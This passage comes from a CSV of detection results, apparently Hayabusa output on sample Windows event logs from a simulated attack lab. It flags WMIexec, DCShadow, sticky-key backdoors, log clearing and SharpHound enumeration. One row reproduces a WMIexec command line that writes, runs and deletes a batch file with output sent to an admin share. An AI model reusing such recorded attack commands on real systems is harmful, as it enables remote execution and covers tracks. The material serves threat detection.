+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx -2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx -2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: 